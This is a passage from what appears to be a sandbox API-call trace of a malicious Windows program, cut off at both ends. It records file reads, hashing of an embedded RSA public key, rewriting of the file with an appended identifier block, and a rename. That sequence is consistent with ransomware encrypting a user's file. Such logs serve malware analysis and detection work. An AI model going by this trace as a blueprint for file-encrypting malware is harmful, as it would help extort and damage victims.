flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0196.105] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x112c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.105] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0196.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.108] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.108] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x112ea, lpOverlapped=0x0) returned 1 [0196.109] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0196.110] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.110] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.110] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0196.111] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0196.111] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.111] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0196.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0196.111] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0196.111] GetLastError () returned 0x0 [0196.111] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0196.111] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0196.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0196.112] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0196.112] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0196.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.112] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0196.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x112f0) returned 0x2d4b778 [0196.112] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0196.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0196.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0196.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cce0 [0196.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1c8 [0196.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cd28 [0196.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1e0 [0196.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a210 [0196.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a270 [0196.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a228 [0196.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0196.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0196.113] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0196.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0196.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0196.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0196.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0196.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a270 [0196.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0196.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a228 [0196.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0196.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a210 [0196.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0196.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0196.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0196.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0196.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0196.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0196.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0196.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0196.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0196.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0196.117] GetCurrentThreadId () returned 0x264 [0196.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0196.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d47050 [0196.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0196.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0196.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0196.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0196.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.118] GetCurrentThreadId () returned 0x264 [0196.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c03ca0 [0196.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0196.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a270 [0196.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a210 [0196.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0196.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0196.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0196.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0196.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a228 [0196.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0196.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0196.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0196.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1f8 [0196.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0196.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a288 [0196.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0196.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a258 [0196.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a240 [0196.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2a0 [0196.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0196.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a240 [0196.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0196.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0196.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0196.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0196.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0196.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a210 [0196.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0196.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0196.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0196.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0d0a0 [0196.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0196.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0196.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0196.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0196.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0196.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0196.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0196.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0196.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0196.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0196.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0196.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0196.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0196.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0196.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0196.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0196.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0196.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cd28 | out: hHeap=0x6a0000) returned 1 [0196.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0196.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0196.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0196.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0196.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0196.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0196.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0196.131] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4b778*, nNumberOfBytesToWrite=0x112e5, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4b778*, lpNumberOfBytesWritten=0x30ffb14*=0x112e5, lpOverlapped=0x0) returned 1 [0196.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4b778 | out: hHeap=0x6a0000) returned 1 [0196.133] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x112ea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.133] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0196.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0196.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0196.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.135] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0196.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.135] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.135] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0196.136] CloseHandle (hObject=0x52c) returned 1 [0196.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b3e8 [0196.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8d0) returned 0x2d3a670 [0196.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0196.138] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab 